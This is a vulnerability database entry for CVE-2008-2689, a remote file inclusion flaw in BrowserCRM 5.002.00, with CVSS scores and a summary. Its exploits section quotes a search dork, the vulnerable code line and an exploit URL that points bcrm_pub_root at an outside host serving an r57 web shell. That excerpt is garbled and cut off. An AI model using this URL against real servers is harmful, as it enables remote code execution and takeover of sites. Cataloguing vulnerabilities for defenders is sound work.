10
CVSSv2

CVE-2008-2689

Published: 13/06/2008 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

PHP remote file inclusion vulnerability in pub/clients.php in BrowserCRM 5.002.00 allows remote malicious users to execute arbitrary PHP code via a URL in the bcrm_pub_root parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

browsercrm browsercrm 5.002.00

Exploits

script: browsercrm-500200 remote file including Download From: wwwbrowsercrmcom/download/browsercrm-500200targz dork: Copyright © 2007 BrowserCRM Ltd Vuln Code : require_once($bcrm_pub_root "/public_prependincphp") exploit: wwwsitecom/browser_crm/pub/clientsphp?bcrm_pub_root=wwwgwebspacede/mohsen/shell/r57t ...